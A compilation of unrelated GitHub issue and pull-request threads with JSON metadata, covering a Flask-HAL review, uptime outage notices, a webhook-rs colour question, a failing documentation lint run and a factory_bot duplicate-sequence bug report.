"_links": {
"self": { "href": "/orders/124" },
"ea:basket": { "href": "/baskets/97213" },
"ea:customer": { "href": "/customers/12369" }
},
"total": 20.00,
"currency": "USD",
"status": "processing"
}]
}
}
@peeklondon @peeklondon CR please.
:+1:
|
gharchive/pull-request
| 2015-08-11T14:32:30 |
2025-04-01T04:36:04.790789
|
{
"authors": [
"krak3n",
"radeklos"
],
"repo": "thisissoon/Flask-HAL",
"url": "https://github.com/thisissoon/Flask-HAL/pull/15",
"license": "unlicense",
"license_type": "permissive",
"license_source": "bigquery"
}
|
194143181
|
Will help maintain the repo
Hey @thomasdavis
If your okay with it I will help maintain the repo , as I do alot of work in this area. If not feel free to close it .
Don't have to ask me twice, welcome to the team! =D
woooo :) awesome stuff
|
gharchive/issue
| 2016-12-07T19:22:58 |
2025-04-01T04:36:04.807945
|
{
"authors": [
"RobertJGabriel",
"thomasdavis"
],
"repo": "thomasdavis/w3cjs",
"url": "https://github.com/thomasdavis/w3cjs/issues/29",
"license": "unlicense",
"license_type": "permissive",
"license_source": "bigquery"
}
|
2523140198
|
🛑 Speedtest-v2-HEL1-1 is down
In e7263e0, Speedtest-v2-HEL1-1 ($URL_SPEEDTEST_V2_HEL1_1) was down:
HTTP code: 0
Response time: 0 ms
Resolved: Speedtest-v2-HEL1-1 is back up in e041753 after 1 hour, 55 minutes.
RCA: https://github.com/thomasmerz/upptime/issues/2990
|
gharchive/issue
| 2024-09-12T19:05:24 |
2025-04-01T04:36:04.833925
|
{
"authors": [
"thomasmerz"
],
"repo": "thomasmerz/upptime",
"url": "https://github.com/thomasmerz/upptime/issues/3035",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
2614109150
|
🛑 Pihole-KA is down
In 76095d7, Pihole-KA ($URL_PIHOLE_MERZ_NIMBUS) was down:
HTTP code: 0
Response time: 0 ms
This should be fixed now for the future: https://github.com/thomasmerz/issue-tracker/issues/518
Resolved: Pihole-KA is back up in 0c94768 after 1 hour, 6 minutes.
|
gharchive/issue
| 2024-10-25T13:26:27 |
2025-04-01T04:36:04.836689
|
{
"authors": [
"thomasmerz"
],
"repo": "thomasmerz/upptime",
"url": "https://github.com/thomasmerz/upptime/issues/3186",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1781852163
|
how exactly does the color method on Embeds work?
are we supposed to pass in a hex value, rgb? there is no documentation or example on this method.
Hey! I did some testing, and it takes the hex code of whatever color you want, converted to a decimal, then to a string.
FF5555
16733525
"16733525"
You probably moved on from this problem a long time ago haha but im putting this here for anyone else who may have the same question!
Thank you so much! Sadly, it's a bit late since I switched to Go and PocketBase to have a websocket end-point. Still, it will help in my other projects.
|
gharchive/issue
| 2023-06-30T04:14:46 |
2025-04-01T04:36:04.848920
|
{
"authors": [
"Blastbrean",
"i1Fury"
],
"repo": "thoo0224/webhook-rs",
"url": "https://github.com/thoo0224/webhook-rs/issues/19",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
1720817069
|
chore: fix linting errors
n/a
Run sudo apt update
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
Hit:1 http://azure.archive.ubuntu.com/ubuntu jammy InRelease
Get:2 http://azure.archive.ubuntu.com/ubuntu jammy-updates InRelease [119 kB]
Get:3 http://azure.archive.ubuntu.com/ubuntu jammy-backports InRelease [108 kB]
Get:4 http://azure.archive.ubuntu.com/ubuntu jammy-security InRelease [110 kB]
Get:5 https://packages.microsoft.com/ubuntu/22.04/prod jammy InRelease [3611 B]
Get:6 http://azure.archive.ubuntu.com/ubuntu jammy-updates/main amd64 Packages [605 kB]
Get:7 http://azure.archive.ubuntu.com/ubuntu jammy-updates/main Translation-en [171 kB]
Get:8 http://azure.archive.ubuntu.com/ubuntu jammy-updates/main amd64 c-n-f Metadata [14.5 kB]
Get:9 http://azure.archive.ubuntu.com/ubuntu jammy-updates/restricted amd64 Packages [260 kB]
Get:10 http://azure.archive.ubuntu.com/ubuntu jammy-updates/restricted Translation-en [38.7 kB]
Get:11 http://azure.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 Packages [905 kB]
Get:12 http://azure.archive.ubuntu.com/ubuntu jammy-updates/universe Translation-en [186 kB]
Get:13 http://azure.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 c-n-f Metadata [18.9 kB]
Get:14 http://azure.archive.ubuntu.com/ubuntu jammy-updates/multiverse amd64 Packages [35.3 kB]
Get:15 http://azure.archive.ubuntu.com/ubuntu jammy-updates/multiverse Translation-en [8452 B]
Get:16 https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu jammy InRelease [23.8 kB]
Get:17 http://azure.archive.ubuntu.com/ubuntu jammy-security/main amd64 Packages [390 kB]
Get:18 http://azure.archive.ubuntu.com/ubuntu jammy-security/main Translation-en [112 kB]
Get:19 http://azure.archive.ubuntu.com/ubuntu jammy-security/main amd64 c-n-f Metadata [9812 B]
Get:20 http://azure.archive.ubuntu.com/ubuntu jammy-security/restricted amd64 Packages [260 kB]
Get:21 http://azure.archive.ubuntu.com/ubuntu jammy-security/restricted Translation-en [38.3 kB]
Get:22 http://azure.archive.ubuntu.com/ubuntu jammy-security/universe amd64 Packages [726 kB]
Get:23 http://azure.archive.ubuntu.com/ubuntu jammy-security/universe Translation-en [126 kB]
Get:24 http://azure.archive.ubuntu.com/ubuntu jammy-security/universe amd64 c-n-f Metadata [14.6 kB]
Get:25 http://azure.archive.ubuntu.com/ubuntu jammy-security/multiverse amd64 Packages [30.2 kB]
Get:26 http://azure.archive.ubuntu.com/ubuntu jammy-security/multiverse Translation-en [5828 B]
Get:27 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main amd64 Packages [64.8 kB]
Get:28 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main all Packages [904 B]
Get:29 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main armhf Packages [7357 B]
Get:30 https://packages.microsoft.com/ubuntu/22.04/prod jammy/main arm64 Packages [14.2 kB]
Get:31 https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu jammy/main amd64 Packages [15.7 kB]
Get:32 https://ppa.launchpadcontent.net/ubuntu-toolchain-r/test/ubuntu jammy/main Translation-en [7292 B]
Fetched 4430 kB in 2s (2591 kB/s)
Reading package lists...
Building dependency tree...
Reading state information...
79 packages can be upgraded. Run 'apt list --upgradable' to see them.
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
Reading package lists...
Building dependency tree...
Reading state information...
snapd is already the newest version (2.58+22.04).
snapd set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 79 not upgraded.
vale (edge) 2.15.4 from Joseph Kato (jdkato) installed
prose:check
vale --minAlertLevel error --output=docs/.vale/vale.tmpl docs
docs/DreamBig/Documentation & QA/2023_T1_UX/UX-Testing-Report.md:
Line 279, position 15 (rule thothtech.American)
error: Use the British spelling "standardised" instead of the American "standardized".
More information: TBA
docs/DreamBig/Documentation & QA/2023_T1_UX/UX-Testing-Report.md:
Line 316, position 44 (rule thothtech.American)
error: Use the British spelling "standardised" instead of the American "standardized".
More information: TBA
2 errors, 0 warnings, and 0 suggestions found.
Error: Process completed with exit code 1.
|
gharchive/pull-request
| 2023-05-22T23:35:27 |
2025-04-01T04:36:04.981781
|
{
"authors": [
"Josh-Piper",
"maddernd"
],
"repo": "thoth-tech/documentation",
"url": "https://github.com/thoth-tech/documentation/pull/309",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
406376024
|
FactoryBot::DuplicateDefinitionError when defining the same-named sequence in the same-named trait in distinct factories
After upgrading to 5.0, I'm seeing this error:
Sequence already registered: from_api_id (FactoryBot::DuplicateDefinitionError)
This code previously worked in 4.x. I've looked at the release notes, but there's nothing obvious there about this (at least to me as a casual user of factory_bot).
Steps to reproduce
Gemfile
# frozen_string_literal: true
source "https://rubygems.org"
gem "factory_bot", "~>5"
example.rb
require 'factory_bot'
User = Struct.new(:id)
Company = Struct.new(:id)
FactoryBot.define do
factory :user, class: User do
trait :from_api do
sequence(:id, '1')
end
end
factory :company, class: Company do
trait :from_api do
sequence(:id, '1')
end
end
end
$ bundle exec ruby example.rb
Traceback (most recent call last):
18: from example.rb:6:in `<main>'
17: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:7:in `define'
16: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:49:in `run'
15: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:49:in `instance_eval'
14: from example.rb:13:in `block in <main>'
13: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:18:in `factory'
12: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/syntax/default.rb:18:in `instance_eval'
11: from example.rb:14:in `block (2 levels) in <main>'
10: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/definition_proxy.rb:174:in `trait'
9: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/definition_proxy.rb:174:in `new'
8: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/trait.rb:12:in `initialize'
7: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/trait.rb:12:in `instance_eval'
6: from example.rb:15:in `block (3 levels) in <main>'
5: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/definition_proxy.rb:122:in `sequence'
4: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot.rb:105:in `register_sequence'
3: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot.rb:105:in `each'
2: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot.rb:106:in `block in register_sequence'
1: from /Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/decorator/disallows_duplicates_registry.rb:6:in `register'
/Users/shep/.rvm/gems/ruby-2.5.3/gems/factory_bot-5.0.0/lib/factory_bot/decorator.rb:10:in `method_missing': Sequence already registered: __from_api_id__ (FactoryBot::DuplicateDefinitionError)
Ruby Versions:
ruby 2.5.3p105 (2018-10-18 revision 65156) [x86_64-darwin18]
ruby 2.6.0p0 (2018-12-25 revision 66547) [x86_64-darwin18]
macOS 10.14.3
Thanks for the issue! That does seem unexpected. I'll try to look into this before the end of the week.
It occurred to me that this is probably because of #1164.
Seems reasonable:
We register them with __#{factory_name}_#{sequence_name}__
We register them with __#{factory_name}_#{sequence_name}__
I don't think that is really true. We register them with @definition.name, which could be either a factory name or a trait name.
I don't think that is really true
You should have a stern talking-to with the developer that opened that PR then 😉
Thanks!
@composerinteralia there is an odd corner case where raising this error causes problems:
Scenario:
you're in a lengthy transition to break down a monolith
some of the code and factories were already pulled-out into an internal gem 🎉
you're working in another repo, something odd breaks, caused by a factory in that gem
copying that factory code over into your current repo could help with setting a breakpoint,
but FactoryBot will throw an error when it encounters the second definition introduced by the gem 😢
Is there a clever way to recover from FactoryBot::DuplicateDefinitionError and just ignore the second definition?
@composerinteralia Could this be optionally just print an error message to the console, and ignore the second definition?
Perhaps print the FILE location of the second definition?
https://github.com/thoughtbot/factory_bot/blob/893eb67bbbde9d7f482852cc5133b4ab57e34b97/lib/factory_bot/decorator/disallows_duplicates_registry.rb#L6
@tilo I think it'd be best to to either open a separate issue or add a comment on an open issue (https://github.com/thoughtbot/factory_bot/issues/968 perhaps, especially as it relates to https://github.com/thoughtbot/factory_bot/pull/1064).
This particular issue was for a bug where we incorrectly raised a DuplicateDefinitionError. We've fixed that particular bug, so additional comments on this issue may get lost.
|
gharchive/issue
| 2019-02-04T15:16:10 |
2025-04-01T04:36:05.001779
|
{
"authors": [
"composerinteralia",
"shepmaster",
"tilo"
],
"repo": "thoughtbot/factory_bot",
"url": "https://github.com/thoughtbot/factory_bot/issues/1257",
"license": "MIT",
"license_type": "permissive",
"license_source": "github-api"
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.